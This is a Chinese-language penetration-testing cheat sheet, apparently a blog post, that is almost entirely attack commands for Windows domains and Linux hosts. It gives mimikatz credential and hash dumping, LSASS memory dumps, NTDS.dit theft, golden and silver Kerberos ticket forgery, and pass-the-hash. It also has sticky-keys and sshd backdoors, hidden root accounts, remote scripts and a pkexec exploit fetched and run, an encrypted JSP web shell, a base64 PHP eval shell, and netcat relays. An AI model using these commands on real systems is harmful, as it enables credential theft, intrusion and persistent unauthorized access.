mimikatz.exe "log hash.txt" "privilege::debug" "sekurlsa::logonPasswords" "exit"
mimikatz.exe "log hash.txt" "privilege::debug" "token::elevate" "lsadump::sam" "exit"
🚀 利用具有微软签名的DumpMinitool.exe工具导出内存
# --file 保存的文件名
# --processId lsass.exe 进程号
DumpMinitool.exe --file dump.txt --processId 948 --dumpType Full
🚀获取系统保存的RDP密码
# 查询远程连接记录
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s
# 解密出明文RDP连接密码, mimikatz执行如下命令:
privilege::debug
dpapi::cred /in:{凭证文件}
sekurlsa::dpapi
dpapi::cred /in:{凭证文件} /masterkey:{MasterKey}
exit
🚀获取系统保存的VPN密码
mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"
🚀获取系统连接的WIFI密码
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
🚀卷影拷贝获取域控凭证, 此方法支持windows server 2003、2008、2012
# 第一步:创建快照 产生的快照GUID为:{850bc5ab-7620-48fa-bd1f-c23c8150a3f0}
ntdsutil.exe snapshot "activate instance ntds" create quit quit
# 第二步:加载快照 快照位置:C:\$SNAP_202009222211_VOLUMEC$\
ntdsutil.exe snapshot "mount {850bc5ab-7620-48fa-bd1f-c23c8150a3f0}" quit quit
# 第三步:复制快照中的ntds.dit文件
copy 'C:\$SNAP_202009222211_VOLUMEC$\Windows\NTDS\ntds.dit' C:\ntds.dit
# 第四步:删除快照
ntdsutil.exe snapshot "List All" quit quit
ntdsutil.exe snapshot "umount {850bc5ab-7620-48fa-bd1f-c23c8150a3f0}" "delete {850bc5ab-7620-48fa-bd1f-c23c8150a3f0}" quit quit
ntdsutil.exe snapshot "List All" quit quit
🚀利用注册表离线导出Hash
reg save HKLM\SYSTEM system.hiv
reg save HKLM\SAM sam.hiv
reg save HKLM\security security.hiv
🚀使用mimikatz解密Hash
mimikatz.exe "log hash.txt" "lsadump::sam /system:system.hiv /sam:sam.hiv /security security.hiv" exit
🚀利用procdump导出内存文件
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# 使用mimikatz抓取密码
mimikatz.exe "sekurlsa::minidump lsass.dmp" "log hash.txt" "sekurlsa::logonPasswords full" "exit"
🚀离线获取系统保存的RDP密码
# 查询远程连接记录
reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s
# 上传procdump获取内存文件, procdump执行如下命令:
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# 解密出明文RDP连接密码, mimikatz执行如下命令:
privilege::debug
dpapi::cred /in:{凭证文件}
sekurlsa::minidump lsass.dmp
sekurlsa::dpapi
dpapi::cred /in:{凭证文件} /masterkey:{MasterKey}
exit
🚀利用PowerShell导出内存
powershell -c "rundll32 C:\windows\system32\comsvcs.dll MiniDump {pid} {output} full"
# 获取保存到注册表中的密码
REG query HKCU /v "pwd" /s"
粘滞键后门
pushd C:\windows\system32
move sethc.exe sethc.exe.bak
copy cmd.exe sethc.exe
🚀 克隆账号
# 将一个账号当前的权限以及账号相关信息克隆到另外一个新账户中, 如果被克隆账号被禁用, 则无法克隆
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Create-Clone.ps1'); Create-Clone -u support -p P@ssw0rd
🚀 伪造黄金票据(伪造TGT)
# 伪造条件:需要伪造的域管理员用户名、完整的域名、域SID、krbtgt的NTLM Hash或AES-256值
# 注意事项:伪造用户可以是任意用户(TGT的加密是由krbtgt完成的,只要TGT被krbtgt账户密码正确加密,那么任意KDC使用krbtgt解密TGT中的信息也是可信的)
# 获取管理员账号
net group "domain admins" /domain
# 获取域名
ipconfig /all
# 获取域SID
wmic useraccount get name,sid //获取域内所有用户sid
whomai /user //获取当前用户sid
# 导出krbtgt的ntml hash (使用mimikatz工具的dcsysc功能远程转储活动目录的ntds.dit并导出krbtgt账号信息)
minikatz.exe "lsadump::dcsync /domain:test.com /user:krbtgt /csv" exit
# 清空票据 mimikatz中输入如下命令
kerberos::purge 或者 klist purge
# 生成票据
kerberos::golden /admin:administrator /domain:test.com /sid:S-1-5-21-593020204-2933201490-533286667 /krbtgt:8894a0f0182bff68e84bd7ba767ac8ed /ticket:golden.kiribi
# 传递票据并注入(如果上一步用的/ptt参数就跳过这一步)
Kerberos::ptt golden.kiribi
# 查看当前会话中的票据
Kerberos::tgt
# 验证权限
dir \\dc\c$
🚀 伪造白银票据(伪造TGS)
# 伪造条件:域名、域SID、需要伪造的用户名、目标服务器的FQDN(Fully Qualified Domain Name) //全限定域名:同时带有主机名和域名的名称、可利用的服务、服务账号的NTML Hash
# 注意事项:票据20分钟内有效,过期之后可以再次导入、银票是伪造的TGS,所以没有与域控制器通信、白银票据仅限于特定服务器上的任何服务、产生任何事件日志都在目标服务器上
# 获取域名
ipconfig /all
# 获取域SID
wmic useraccount get name,sid //获取域内所有用户sid
whomai /user //获取当前用户sid
# 获取服务账号的NTML Hash
Mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit // 需要管理员权限
# 清空票据 mimikatz中输入如下命令
kerberos::purge
# 生成票据
mimikatz "kerberos::golden /user:LukeSkywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-774954089-2222329127 /target:adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt" exit
白银票据需要的参数:
/target: 目标服务器的FQDN:(Fully Qualified Domain Name)全限定域名:同时带有主机名和域名的名称。(通过符号".")
/service: 运行在目标服务器上的kerberos服务,该服务主体名称类型如cifs,http,mssql等
/rc4: 服务的NTLM散列(计算机帐户或用户帐户)
# 查看当前会话中的票据
Kerberos::tgt
# 验证权限
dir \\dc\c$
# 开启UAC后, 只有本地管理员组里的账户能pth。域Domain admin默认在本地管理员组
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
🚀445端口SMB哈希传递
# 使用impacket套件的psexec.exe工具:
# 需要开放445端口, 此方法已被杀软列入黑名单
# 需要远程系统开启admin$共享(默认是开启的)
# 在使用PsExec执行命令时,会在目标系统中创建一个psexec服务。命令执行后,psexec服务将被自动删除。但创建或删除服务时会产生大量的日志
# -accepteula:第一次运行PsExec会弹出确认框,使用该参数就不会弹出确认框
# -s:以system权限运行远程进程,获得一个system权限的交互式shell。如果不使用该参数,会获得一个administrator权限的shell。
psexec.exe /accepteula /s \\127.0.0.1 -u cloud/administrator -p P@ssw0rd -s cmd
🚀使用impacket套件的mmcexec工具:
mmcexec.exe -hashes e10adc3949ba59abbe56e057f20f883e cloud/administrator@127.0.0.1
🚀使用impacket套件的smbclient工具:
smbclient.exe cloud/administrator:P@ssw0rd@127.0.0.1
smbclient.exe -hashes e10adc3949ba59abbe56e057f20f883e cloud/administrator@127.0.0.1
🚀135端口WMI哈希传递
# 使用impacket套件的wmiexec工具:
# 在使用wmiexec进行横向移动时,Windows操作系统默认不会产生日志,此方法比PsExec隐蔽性要更好一些
wmiexec.exe cloud/administrator:P@ssw0rd@127.0.0.1
wmiexec.exe -hashes :e10adc3949ba59abbe56e057f20f883e cloud/administrator@127.0.0.1
🚀查看远程计算机进程
tasklist /S 192.168.31.17 /U domain\administrator /P /V
查看系统版本和补丁信息: systeminfo
识别操作系统名称及版本(英文): systeminfo | findstr /B /C:"OS Name" /c:"OS Version"
识别操作系统名称及版本(中文): systeminfo | findstr /B /C:"OS 名称" /C:"OS 版本"
识别系统体系结构: echo %PROCESSOR_ARCHITECTURE% AMD64
查看当前用户: whoami
查看计算机用户列表: net user
查看计算机用户组列表: net localgroup
查看当前登录用户: query user
查看当前用户保存的凭证: cmdkey /list
查看当前用户保存的票据凭证: klist
查看路由信息 : route print
查看arp : arp -A
查看ip地址和dns信息: ipconfig /all
查看防火墙规则: netsh firewall show config
查看当前防火墙状态: netsh firewall show state
查看系统开放端口: netstat -ano
查看计划任务: schtasks /query /fo LIST /v
查看安装驱动: driverquery
查看安装程序和版本信息: wmic product list brief
查看服务: wmic service list brief
查看进程: wmic process list brief
根据进程查找进程文件: wmic process where name="xxxx.exe" get processid,executablepath,name
wmic process where name="chrome.exe" list full
查看启动程序信息: wmic startup list brief
查看3389端口: for /f "tokens=2" %i in ('tasklist /FI "SERVICES eq TermService" /NH') do netstat -ano | findstr %i | findstr LISTENING
Win设置终端代理: set http_proxy=http://127.0.0.1:7890 & set https_proxy=http://127.0.0.1:7890
查看.msi程序的执行权限: reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v
AlwaysInstallElevated
查看是否设置setuid、setgid: reg HKEY_Local_Machine\System\CurrentControlSet\Services\NfsSvr\Parameters\SafeSetUidGidBits
查看安装补丁和时间信息: wmic qfe get Caption,Description,HotFixID,InstalledOn
查看特定漏洞补丁信息: wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KBxxxxxxxx"
查看系统进程: tasklist /svc
列出详细进程: tasklist /V /FO CSV
搜索D盘磁盘名字为logo.jpg的文件: cd /d D:\ && dir /b /s logo.jpg
搜素C盘文件夹下后缀conf内容有password: findstr /s /i /n /d:C:\ "password" *.conf
查找密码文件或其他敏感文件: dir /b/s password.txt dir /b/s .doc dir /b/s .ppt dir /b/s .xls dir /b/s .docx dir /b/s .xlsx dir /b/s config.* findstr /si password .xml .ini .txt findstr /si
login .xml .ini .txt
查看无人值守安装文件,文件位置如下: C:\sysprep.inf C:\sysprep\sysprep.xml C:\Windows\Panther\Unattend\Unattended.xml C:\Windows\Panther\Unattended.xml
添加用户并设置密码: net user mstlab tools /add
将用户加入管理组: net localgroup administrators tools /add
将用户加入桌面组: net localgroup "Remote Desktop Users" tools /add
激活guest用户: net user guest /active:yes
更改guest用户的密码: net user guest 123456
将guest用户加入管理组: net localgoup administrators guest /add
查看3389端口: REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
开启远程桌面: REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
注册表抓取明文: REG ADD HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
rdp连接默认的10个记录: reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default"
rdp连接默认的所有记录: reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /s
查找软件安装目录: reg query HKLM /f foxmail /t REG_SZ /s
mimikatz查看当前密码: mimikatz "log" "privilege:debug" "sekurlsa:logonpasswords" "exit"
mimikatz抓取domain密码: mimikatz "lsadump::dcsync /domain:test.com /all /csv" "exit"
reg导出注册表hash: reg save hklm\sam c:\programdata\sam.hive && reg save hklm\system c:\programdata\system.hive
mimikatz读取注册表导出的hash信息: mimikatz "log" "lsadump::sam /sam:sam.hive /system:system.hive" "exit"
impacket包的secretsdump: secretsdump.exe -sam sam.hive -system system.hive LOCAL
nmap扫描永恒之蓝漏洞: nmap -p445 --script smb-vuln-ms17-010 127.0.0.1
meterpreter把目标的3389端口转发到vps的6666端口: portfwd add -l 6666 -p 3389 -r 127.0.0.1
attrib创建隐藏文件: attrib +s +h +r *.exe
.net静默安装: dotNetFx40_Full_x86_x64.exe /q /norestart /ChainingPackage FullX64Bootstrapper
lcx端口转发: 本地监听: lcx.exe -listen 110 34567目标执行: lcx.exe -slave vpsip 110 127.0.0.1 3389
扫描web.txt文件的网站标题: 本地监听: whatweb -i web.txt -p Title whatweb
Win终端设置代理: 本地监听: set http_proxy=socks5://127.0.0.1:1080 && set https_proxy=socks5://127.0.0.1:1080
xfreerdp hash连接rdp: xfreerdp /u:administrator /pth:ccef208c6485269c20db2cad21734fe7 /v:10.20.24.100 /cert-ignore //server 2012
runas运行其它账户权限的程序: runas /user:hostname\\username /sa "cmd.exe"
certutil下载文件: certutil -urlcache -split -f http://192.168.5.21:888/nc.txt c:\nc.txt
certutil删除记录: certutil -urlcache -split -f http://192.168.1.115/robots.txt delete
bitsadmin下载文件: bitsadmin /rawreturn /transfer getfile http://download.sysinternals.com/files/PSTools.zip c:\Pstools.zip
wmic远程连接机器: wmic /node:"192.168.1.20" /user:"domain\administrator" /password:"123456"
查看系统安装软件: wmic product get name,version
查看系统版本: wmic OS get Caption,CSDVersion,OSArchitecture,Version
根据Pid查找进程路径: wmic process get name,executablepath,processid|findstr pid
查看磁盘信息: Wmic logicaldisk
查看组、hostname等信息: wmic computersystem get Name, Domain, Manufacturer, Model, Username, Roles/format:list
查看当前系统是否是VMWARE: wmic bios list full | find /i "vmware"
查看当前系统是否有屏保及延迟: wmic desktop get screensaversecure,screensavertimeout
mssql开启xp_cmdshell: EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;
mssql输出文件: exec master..xp_cmdshell '>>c:\windows\temp\info.txt set /p="base64_encode" <nul'; //代替echo输出
查看c盘下web.config文件: findstr /c:"User Id=" /c:"Password=" /si web.config >> tmps.logs <nul';
常规工作组内网环境下的mssql实例: PowerShell -Command "[System.Data.Sql.SqlDataSourceEnumerator]::Instance.GetDataSources()"
# 7Z压缩文件
7z.exe a OutputFile InputFile
# 7Z解压文件
7z.exe x InputFile OutputFile
# RAR压缩文件
rar.exe a OutputFile InputFile
# RAR解压文件
rar.exe x InputFile OutputFile
dir c:\\ /s /b | find "win.ini"
dir c:\\ /s /b | find "navicat.exe"
dir c:\\ /s /b | find "finalshell.exe"
cd /d C:\ && dir /b /s password.txt
where /R C:\ password.txt
echo ^<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%^> >> C:/x/x.jsp
echo ^<%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%^> >> C:/x/x.jsp
echo ^<%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%^> >> C:/x/x.jsp
netsh wlan show profiles
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
查看当前用户目录%HOMEPATH
查看当前目录%CD%
列出用户共享主目录的网络路径%HOMESHARE%
列出有效的当前登录会话的域名控制器名
列出了可执行文件的搜索路径%Path%
列出了处理器的芯片架构%PROCESSOR_ARCHITECTURE%
列出了Program Files文件夹的路径%ProgramFiles%
列出了当前登录的用户可用应用程序的默认临时目录%TEMP% and %TMP%
列出了当前登录的用户可用应用程序的默认临时目录%TEMP% and %TMP%
列出了包含用户帐号的域的名字%USERDOMAIN%
列出操作系统目录的位置%WINDIR%
返回“所有用户”配置文件的位置%ALLUSERSPROFILE%
返回处理器数目%NUMBER_OF_PROCESSORS%
powershell地址%PSModulePath%
🚀
for /l %i in (1,1,255) do @ping 192.168.0.%i -w 1 -n 1 | find /i "ttl"
for /l %i in (1,1,255) do @ping 192.168.0.%i -w 1 -n 1 | find /i "ttl">>"c:\\a.txt"
for /l %i in (1,1,255) do @ping 192.168.%i.1 -w 1 -n 1 | find /i "ttl"
certutil -urlcache -split -f http://test.abc.net
powershell Invoke-WebRequest "http://test.abc.net/"
wmic /namespace:\\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1
wmic /namespace:\\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f
type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
type %appdata%\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
certutil.exe -hashfile 1.txt
停止指定pid进程 taskkill /f /pid 3352
停止指定exe taskkill /f /im explor.exe
🚀
创建Root权限账户
useradd -p `openssl passwd -1 -salt 'support' Passw0rd` -o -u 0 -g root -G root -s /bin/bash -d /home/support
🚀创建普通权限账户
useradd -p `openssl passwd -1 -salt 'support' Passw0rd` support
🚀创建Root权限账户
useradd -p `openssl passwd -1 -salt 'support' Passw0rd` -o -u 0 -g root -G root -s /bin/bash -d /home/support
🚀创建普通权限账户
useradd -p `openssl passwd -1 -salt 'support' Passw0rd` support
🚀软链接后门
# 后门植入
service iptables stop
ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=20020
# 后门连接 输入任意密码,成功登录
ssh root@IP -p 20020
🚀SUID提权
find / -perm -u=s -type f 2> /dev/null
SUID提权
具有提权功能的Linux可执行文件有:nmap vim find bash more less nano cp
🚀PKEXEC提权(CVE-2021-4034)
wget --no-check-certificate https://github.com/dzonerzy/poc-cve-2021-4034/releases/download/v0.2/exploit -O /tmp/.ICE-unix/run 2>&1 > /dev/null
chmod +x /tmp/.ICE-unix/run
/tmp/.ICE-unix/run
cat /etc/issue //查看系统发行版本信息
cat /etc/*-release
cat /etc/lsb-release //Debian
cat /etc/redhat-release //Redhat
cat /proc/version
uname -a // 查看内核、操作系统、CPU信息
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep wmlinuz-
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set
查看是否有打印机: lpstat -a
查看正在运行的程序及对应的用户权限:
ps aux
ps -ef
top
cat /etc/services
查看以root权限运行的进程:
ps aux | grep root
ps -ef | grep root
查看安装的应用:
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archives
ls -alh /var/cache/yum/
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
ls -aRI /etc/ | awk '$1 ~ /^.*r.*/'
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
id
who
w
last
cat /etc/passwd
cat /etc/group
cat /etc/shadow
grep -v -E "^#"/etc/passwd | awk -F: '$3 == 0 {print $1}'
awk -F:'($3 == "0") {print}' /etc/passwd
cat /etc/sudoers
sudo -l
ls -ahlR /root/
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"
查看当前网络地址:
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/susconfig/network
查看网络配置、DNS、 DHCP、网关:
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname //查看计算机名
dnsdomainname
查看网络通信:
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
查看缓存:
arp -e
route
/sbin/route -nee
linux设置终端代理: export https_proxy=http://127.0.0.1:7890 http_proxy=http://127.0.0.1:7890 all_proxy=socks5://127.0.0.1:7890
linx终端搜索软件: find / -name pass.txt
linux查找后缀properties文件内容带password字样: find / -name *.properties | xargs grep password //xml,sh,python等等
linux把tomcat目录文件和文件夹列表导出到oa.txt: find /home/tomcat/ -type f > oa.txt
编码字符base64然后echo输出logo.php再进行解码: echo -n "PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4+" | base64 -d > logo.php //可绕过杀软拦截关键字
LCX:
lcx -
cx -listen 4567 33891 #Attacker
lcx -slave 111.222.333.444 4567 127.0.0.1 3389 # On the targets
SSH:
ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7 # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7 # Remote Port
mknod:
mknod backpipe p ; nc -l -p [remote port] < backpipe | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe # Proxy monitor (Port 80 to 8080)
隧道:
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig
find / -name passwd
echo xxxxx== |base64 -d > /var/www/html/1.jsp
for i in 192.168.0.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i is alived; fi; done
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,cGluZyBgd2hvYW1pYC4xZnUwYnguZG5zbG9nLmNu}|{base64,-d}|{bash,-i}" -A "x.x.x.x"
629
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
